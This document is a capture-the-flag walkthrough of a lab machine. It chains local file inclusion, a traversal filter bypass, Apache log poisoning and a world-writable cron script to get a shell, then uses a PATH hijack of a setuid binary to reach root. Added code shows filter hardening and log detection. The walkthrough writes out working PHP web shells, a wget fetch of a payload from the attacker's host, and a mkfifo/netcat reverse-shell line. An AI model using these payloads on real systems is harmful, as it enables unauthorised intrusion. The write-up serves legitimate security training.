Enumeration


 

root@kali:~/tryhackme/archangle# nmap -sC -sV 10.10.169.125

Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-04 14:01 EST
Nmap scan report for mafialive.thm (10.10.169.125)
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9f:1d:2c:9d:6c:a4:0e:46:40:50:6f:ed:cf:1c:f3:8c (RSA)
|   256 63:73:27:c7:61:04:25:6a:08:70:7a:36:b2:f2:84:0d (ECDSA)
|_  256 b6:4e:d2:9c:37:85:d6:76:53:e8:c4:e0:48:1c:ae:6c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/test.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Navigating to the website, I see a normal-looking site; however, under "Send us Mail" I find another hostname, mafialive.thm.

[screenshot: website]

I add this hostname to my /etc/hosts file, navigate to the new site, and find the first flag.

[screenshot: flag1]

Running gobuster on mafialive.thm, I find test.php (the same path robots.txt disallowed in the nmap output):

root@kali:~/tryhackme/archangle# gobuster dir -u http://mafialive.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://mafialive.thm/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2021/02/04 14:08:16 Starting gobuster
===============================================================
/test.php (Status: 200)

Navigating to test.php, I find a button.

[screenshot: test]

Pressing the button, I find the URL changes to test.php?view=/var/www/html/development_testing/mrrobot.php, which looks like a file-inclusion parameter.

[screenshot: test1]

Exploit


LFI PHP Wrappers

A parameter like view= that takes a file path is a candidate for several issues: directory traversal, RFI and LFI, and more generally injection of anything the server passes on. Testing them one by one, I find most attempts end with a "Sorry, Thats not allowed" response.

[screenshot: notallowed]

Testing PHP wrappers for LFI, I find that the php://filter wrapper is accepted and returns the included file base64-encoded, which lets me read PHP source instead of having it executed:

http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/mrrobot.php

[screenshot: base64]

Trying to read /etc/passwd still fails, so I read test.php itself through the same wrapper to see what filtering is applied:

┌──(kali㉿kali)-[~/thm/archangel]
└─$ curl http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php

<!DOCTYPE HTML>
<html>

<head>
<title>INCLUDE</title>
<h1>Test Page. Not to be Deployed</h1>

</button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>
[long base64 string omitted] </div>
</body>

</html>

This gives a long base64 value. I save it to a file on my machine and then decode it:

root@kali:~/tryhackme/archangle# cat base | base64 -d

<!DOCTYPE HTML>
<html>

<head>
    <title>INCLUDE</title>
    <h1>Test Page. Not to be Deployed</h1>
 
    </button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>
        <?php

            //FLAG: thm{explo1t1ng_lf1}

            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
            if(isset($_GET["view"])){
            if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {
                include $_GET['view'];
            }else{

                echo 'Sorry, Thats not allowed';
            }
        }
        ?>
    </div>
</body>

</html>

Log Poisoning

Looking at the decoded source, there are only two conditions: the view value must not contain the literal string ../.. and it must contain /var/www/html/development_testing (containsStr uses strpos, so the directory only has to appear somewhere in the string, not at the start). A well-known bypass for a literal ../.. blocklist is to insert a double forward slash, ..//.., which does not match the blocked string but climbs the same directories because the filesystem collapses repeated slashes.
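To make the bypass concrete, here is an added Python re-implementation of the two checks in test.php next to a canonicalising version. It is illustrative code, not the box's PHP; the payload strings are constructed to match the ones used on this page.

```python
import posixpath

# Added example (not the page's PHP): a Python re-implementation of the two
# checks test.php applies to the "view" parameter, next to a hardened version.
# BASE is the directory that appears in the page's containsStr() check.
BASE = "/var/www/html/development_testing"


def original_filter_allows(view):
    """Mirror of the page's logic: block the literal '../..' anywhere and
    require BASE to appear anywhere (strpos-style 'contains', not 'starts with')."""
    return "../.." not in view and BASE in view


def path_as_opened(view):
    """What the filesystem actually opens: repeated slashes collapse and each
    '..' climbs one directory, so '..//..' does exactly what '../..' does."""
    return posixpath.normpath(view)


def hardened_filter_allows(view):
    """Canonicalise first, then require the result to stay inside BASE.
    Rejects any scheme such as php:// and any spelling of a traversal.
    On a real server use os.path.realpath() so symlinks are resolved too."""
    if not view.startswith("/"):
        return False
    resolved = posixpath.normpath(view)
    return resolved == BASE or resolved.startswith(BASE + "/")


# Constructed payloads matching the ones sent on this page.
MRROBOT = BASE + "/mrrobot.php"
NAIVE_TRAVERSAL = BASE + "/../../../../etc/passwd"
DOUBLE_SLASH = BASE + "/..//..//..//..//..//etc/passwd"
FILTER_WRAPPER = "php://filter/convert.base64-encode/resource=" + BASE + "/test.php"

if __name__ == "__main__":
    print("original hardened opened-as")
    for p in (MRROBOT, NAIVE_TRAVERSAL, DOUBLE_SLASH, FILTER_WRAPPER):
        print(f"{original_filter_allows(p)!s:8} {hardened_filter_allows(p)!s:8} {path_as_opened(p)}")
```

The point of the table the script prints is that the original check passes both the ..// payload and the php://filter payload, while the canonicalising check rejects both and still allows the legitimate mrrobot.php include.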

I test the double slash to see if I can read /etc/passwd:

┌──(kali㉿kali)-[~/thm/archangel]
└─$ curl http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//..//etc/passwd | html2text

****** Test Page. Not to be Deployed ******
Here_is_a_button
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
--snp--
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
archangel:x:1001:1001:Archangel,,,:/home/archangel:/bin/bash


I can now use this to read files on the box. Looking for SSH keys does not work and I can't find any other useful files, so I try log poisoning. First, I need to find where the logs are stored. Testing the default locations, I find that /var/log/apache2/access.log is readable through the LFI and contains the HTTP server's request log:

view-source:http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log

[screenshot: log]

Scrolling to the bottom of this log file, I see all of my requests to the vulnerable LFI endpoint.

[screenshot: log1]

Since my requests are written to this file, I can place PHP code in a request header and have it executed when /var/log/apache2/access.log is included through the LFI. To start, I send a request whose User-Agent header is a minimal PHP web shell:

User-Agent: <?php system($_GET['cmd']); ?>

Refreshing access.log through the LFI, I see my PHP code is now in the log file, and it is interpreted as PHP when the log is included.

I can now test command execution by adding a cmd parameter to the same include request.
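From the defender's side, every step of this chain leaves a distinctive line in the very log being poisoned. The following added example (not from the page) parses constructed Apache combined-format lines shaped like the requests above and tags the wrapper use, the ..// traversal, reads of sensitive files and a PHP tag in the User-Agent; the sample lines, the tag names and the function names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" log format. They are shaped
# like the requests this page sends but were not captured from the target.
SAMPLE_LOG = """\
10.9.2.255 - - [04/Feb/2021:14:10:01 -0500] "GET /test.php?view=/var/www/html/development_testing/mrrobot.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.9.2.255 - - [04/Feb/2021:14:12:44 -0500] "GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php HTTP/1.1" 200 2048 "-" "curl/7.74.0"
10.9.2.255 - - [04/Feb/2021:14:15:09 -0500] "GET /test.php?view=/var/www/html/development_testing/..//..//..//..//..//etc/passwd HTTP/1.1" 200 1645 "-" "curl/7.74.0"
10.9.2.255 - - [04/Feb/2021:14:20:30 -0500] "GET / HTTP/1.1" 200 10 "-" "<?php system($_GET['cmd']); ?>"
10.9.2.255 - - [04/Feb/2021:14:20:45 -0500] "GET /test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log&cmd=id HTTP/1.1" 200 9000 "-" "curl/7.74.0"
"""

# Combined log format: ip ident user [time] "method target proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def classify(line):
    """Return the list of indicator tags for one log line (empty if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    # URL-decode so %2e%2e and friends are judged the same as the plain form.
    target = unquote(m.group("target"))
    ua = unquote(m.group("ua"))
    tags = []
    # A PHP open tag in a header or URL is the poisoning payload itself.
    if "<?php" in ua or "<?=" in ua or "<?php" in target:
        tags.append("php-in-request")
    # Stream wrappers in an include parameter (php://filter is what the page used).
    if re.search(r"(php|data|expect|zip|phar)://", target, re.I):
        tags.append("php-wrapper")
    # Any '../' also covers the '..//' spelling used to beat the ../.. blocklist.
    if "../" in target or "..\\" in target:
        tags.append("traversal")
    # Files that only matter to an attacker: logs to include, passwd, environ.
    if re.search(r"/var/log/|/proc/self/environ|/etc/passwd", target):
        tags.append("sensitive-file")
    return tags


def scan(log_text):
    """Return (line_number, tags) for every line that carries an indicator."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        tags = classify(line)
        if tags:
            hits.append((n, tags))
    return hits


if __name__ == "__main__":
    for n, tags in scan(SAMPLE_LOG):
        print(n, ", ".join(tags))
```

Note that line 4, the poisoning request itself, hits only on the User-Agent and otherwise looks like a request for /; a detection that only inspects the URL would miss it, which is why the UA and referer fields belong in the rule.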

First, I uploaded puck.php:

GIF8
<?php echo system($_REQUEST['puck']); ?>

Second, I accessed it:

┌──(kali㉿kali)-[~/thm]
└─$ curl http://mafialive.thm/puck.php?puck=ls
GIF8
index.html
mrrobot.php
puck.php
puck.php.1

Third, I used it to fetch rev.php from a Python HTTP server on my machine:

┌──(kali㉿kali)-[~/thm]
└─$ curl http://mafialive.thm/puck.php?puck=wget+http%3a//10.9.2.255%3a8000/rev.php 
GIF8
┌──(kali㉿kali)-[~/thm/archangel]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.191.165 - - [22/Jul/2021 04:51:25] "GET /rev.php HTTP/1.1" 200 -

Fourth, I requested rev.php and got the shell on my listener:

┌──(kali㉿kali)-[~/thm]
└─$ curl http://mafialive.thm/rev.php
┌──(kali㉿kali)-[~/thm]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.9.2.255] from (UNKNOWN) [10.10.191.165] 39902
Linux ubuntu 4.15.0-123-generic #126-Ubuntu SMP Wed Oct 21 09:40:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
14:23:51 up 2:24, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$


Since I can execute commands, I can transfer files. Using a PHP reverse shell, I can pull the file onto the target and then navigate to it: I set up a Python HTTP server on my local machine and use wget through the web shell to fetch the file.

I first upgrade the shell to a full TTY with python3:

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/archangle# stty raw -echo
root@kali:~/tryhackme/archangle# fg

www-data@ubuntu:/$

I can now read the second flag

[screenshot: flag2]

Exploiting archangel User


To start, I uploaded and ran linpeas.sh:

www-data@ubuntu:/tmp$ wget 10.2.8.75/linpeas.sh

--2021-02-05 01:43:42--  http://10.2.8.75/linpeas.sh
Connecting to 10.2.8.75:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 229696 (224K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 224.31K  61.4KB/s    in 3.7s

2021-02-05 01:43:47 (61.4 KB/s) - 'linpeas.sh' saved [229696/229696]

www-data@ubuntu:/tmp$ bash linpeas.sh

Looking through the results, I find a cron job that runs every minute as the archangel user:

[+] Cron jobs 

.............................................

*/1 *   * * *   archangel /opt/helloworld.sh

Looking at this file, I see it is a basic script that appends a line to a text file:

www-data@ubuntu:/opt$ cat helloworld.sh 
#!/bin/bash
echo "hello world" >> /opt/backupfiles/helloworld.txt

Looking at the permissions, I find the file is world-writable (mode 777), even though it is owned by archangel:

www-data@ubuntu:/opt$ ls -la helloworld.sh 
-rwxrwxrwx 1 archangel archangel 66 Nov 20 10:35 helloworld.sh

Since I can write to the file, I replace its contents with a reverse shell one-liner. This overwrites the shebang line, but cron runs the job through /bin/sh, which still interprets the file as a shell script:

www-data@ubuntu:/opt$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.8.75 1234 >/tmp/f" > helloworld.sh
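The check linpeas performed here can be reproduced in a few lines. This added Python example (my code, not linpeas or anything from the page) parses system-crontab lines, stats the program each job executes and reports any that other users can write to. Because the real /etc/crontab is not on this page, demo() recreates the situation in a temporary directory: a mode-777 helloworld.sh referenced by a crontab line, plus a correctly permissioned job for contrast.

```python
import os
import stat
import tempfile


def parse_system_crontab(text):
    """Return (user, command) pairs from /etc/crontab or /etc/cron.d lines.
    System crontabs carry five time fields (or an @keyword), then the user,
    then the command; environment assignments and comments are skipped."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split()[0]
        if "=" in first:                       # e.g. PATH=... or SHELL=...
            continue
        if first.startswith("@"):              # @reboot user command
            parts = line.split(None, 2)
            if len(parts) == 3:
                jobs.append((parts[1], parts[2]))
        else:                                  # m h dom mon dow user command
            parts = line.split(None, 6)
            if len(parts) == 7:
                jobs.append((parts[5], parts[6]))
    return jobs


def writable_by_others(path):
    """True if the mode grants write to 'other', as the page's -rwxrwxrwx does."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def world_writable_cron_targets(crontab_text):
    """For each job, look at the program cron will exec (first token of the
    command) and report it if anyone on the box can modify it."""
    findings = []
    for user, cmd in parse_system_crontab(crontab_text):
        target = cmd.split()[0]
        if target.startswith("/") and os.path.isfile(target) and writable_by_others(target):
            mode = oct(stat.S_IMODE(os.stat(target).st_mode))
            findings.append((user, target, mode))
    return findings


def demo():
    """Constructed scenario: a 777 script and a 755 script, both referenced
    from a crontab snippet. Returns the findings list."""
    d = tempfile.mkdtemp()
    script = os.path.join(d, "helloworld.sh")
    with open(script, "w") as fh:
        fh.write('#!/bin/bash\necho "hello world" >> /opt/backupfiles/helloworld.txt\n')
    os.chmod(script, 0o777)
    safe = os.path.join(d, "rotate.sh")
    with open(safe, "w") as fh:
        fh.write("#!/bin/sh\ntrue\n")
    os.chmod(safe, 0o755)
    crontab = (
        "SHELL=/bin/sh\n"
        "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
        "# m h dom mon dow user  command\n"
        f"*/1 *   * * *   archangel {script}\n"
        f"@daily          root      {safe} --quiet\n"
    )
    return world_writable_cron_targets(crontab)


if __name__ == "__main__":
    for user, target, mode in demo():
        print(f"{user}: {target} is {mode}")
```

This only inspects the first token of each command. A complete audit also checks the directories on the path to that file, anything the script sources or executes in turn, and whether the target is owned or group-writable by the current user, which is why linpeas prints more than this.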

After setting up a netcat listener and waiting a minute for cron to fire, I get a connection back as archangel:

root@kali:~/tryhackme/archangle# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.166.10] 40080
/bin/sh: 0: can't access tty; job control turned off

$ whoami
archangel

Again, I upgrade the shell to a full TTY with python3:

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
archangel@ubuntu:~$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/archangle# stty raw -echo
root@kali:~/tryhackme/archangle# fg

archangel@ubuntu:~$ 

Now I can read the third flag.

[screenshot: flag3]

Privilege Escalation to root


In archangel's secret folder, I find a file named backup. Looking at it, I find it is a setuid ELF executable owned by root that anyone can execute, so whatever it does runs with root's privileges:

archangel@ubuntu:~/secret$ file backup 
backup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=9093af828f30f957efce9020adc16dc214371d45, for GNU/Linux 3.2.0, not stripped

archangel@ubuntu:~/secret$ ls -la backup 
-rwsr-xr-x 1 root root 16904 Nov 18 16:40 backup

I would like to know what this executable does, so I run strings against it. Among the imported symbols (setuid, setgid, system) I find the command it passes to system(): it copies everything in the myfiles folder to /opt/backupfiles using cp.

archangel@ubuntu:~/secret$ strings backup
/lib64/ld-linux-x86-64.so.2
setuid
system
__cxa_finalize
setgid
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
cp /home/user/archangel/myfiles/* /opt/backupfiles

The command does not use the full path for cp, so system() hands it to /bin/sh, which locates cp by searching the directories listed in the PATH environment variable in order (normally system directories such as /usr/bin and /bin). Because the binary inherits our environment, we can prepend a directory we control to PATH and put our own cp there; when backup runs, ours is found first and executed. The setuid and setgid imports seen in strings indicate the program sets its IDs to root before calling system(), so the shell our fake cp starts keeps root (bash would otherwise drop an effective UID that differs from the real UID unless started with -p).

To start, I create an executable file named cp in /tmp that simply runs /bin/bash:

archangel@ubuntu:/tmp$ echo "/bin/bash" > cp
archangel@ubuntu:/tmp$ chmod 777 cp

Now I prepend /tmp to my PATH variable so it is searched first:

archangel@ubuntu:/tmp$ export PATH=/tmp:$PATH

With PATH changed, when I execute backup, the shell started by system() finds /tmp/cp before the real one and executes it. Because backup is setuid root, the bash it launches runs as root:

archangel@ubuntu:/tmp$ ~/secret/backup 
root@ubuntu:/tmp# 
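The resolution step the hijack relies on can be demonstrated without a setuid binary. This added example (my code, not the backup binary or the shell session above) resolves the command string recovered by strings the way /bin/sh would: once with a directory holding a fake cp prepended to PATH, once with a PATH the program sets for itself, and once with the command rewritten to use an absolute /bin/cp. The fake cp only echoes a marker instead of starting a shell.

```python
import os
import shutil
import tempfile

# From the page's strings output: the command the setuid binary passes to system().
COMMAND = "cp /home/user/archangel/myfiles/* /opt/backupfiles"
# Stand-in for the page's /bin/bash dropper; just prints a marker.
FAKE_CP = "#!/bin/sh\necho hijacked\n"


def resolve_first_word(command, path_value):
    """What /bin/sh does for system(): take the first word and, if it has no
    slash, search the PATH directories left to right for an executable file."""
    prog = command.split()[0]
    if "/" in prog:
        return prog                       # absolute or relative path: no search
    return shutil.which(prog, path=path_value)


def demo():
    """Plant a fake cp in a temp dir and resolve COMMAND three ways.
    Returns (tmpdir, hijacked, safe, fixed)."""
    tmp = tempfile.mkdtemp()
    fake = os.path.join(tmp, "cp")
    with open(fake, "w") as fh:
        fh.write(FAKE_CP)
    os.chmod(fake, 0o755)                 # the page used 777; +x is all that matters

    # Equivalent of the page's `export PATH=/tmp:$PATH`.
    attacker_path = tmp + os.pathsep + os.defpath
    hijacked = resolve_first_word(COMMAND, attacker_path)

    # A binary that calls setenv("PATH", ...) or clearenv() before system()
    # never sees the attacker's directory.
    safe = resolve_first_word(COMMAND, os.defpath)

    # Simplest fix in the source: spell the program with its absolute path.
    fixed_command = "/bin/cp " + COMMAND.split(" ", 1)[1]
    fixed = resolve_first_word(fixed_command, attacker_path)
    return tmp, hijacked, safe, fixed


if __name__ == "__main__":
    tmp, hijacked, safe, fixed = demo()
    print("attacker PATH  ->", hijacked)
    print("reset PATH     ->", safe)
    print("absolute path  ->", fixed)
```

Either fix (an absolute path, or resetting PATH before system()) closes the hijack, but only dropping the setuid bit or replacing system() with execve of a fixed path removes the underlying risk of running shell commands with root privileges.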

As root, I can now read the final flag

[screenshot: root]